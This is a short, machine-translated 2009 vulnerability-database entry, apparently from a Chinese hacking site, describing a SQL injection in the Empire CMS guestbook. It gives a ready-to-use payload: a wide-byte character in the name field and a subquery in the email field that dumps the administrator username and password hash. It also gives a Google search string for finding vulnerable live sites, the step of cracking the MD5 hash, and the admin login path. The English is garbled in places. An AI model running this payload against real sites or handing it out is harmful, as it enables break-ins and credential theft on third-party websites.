Empire CMS0day----the success rate of the high Oh-vulnerability warning-the black bar safety net

2009-07-13T00:00:00
ID MYHACK58:62200923854
Type myhack58
Reporter 佚名
Modified 2009-07-13T00:00:00

Description

Find used Empire CMS station,the site behind a directly applied:e/tool/gbook/? bid=1 Out is Empire CMS the guestbook,in the name of writing:缞\ Contact email at:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* After the submission of the burst account password

Test method: using the google search keyword inurl:e/tool/gbook/? bid=1, then in accordance with the above manner message, to display the results that broke the administrator account and password for the md5 value, the crack password login in the background.

Background/e/admin/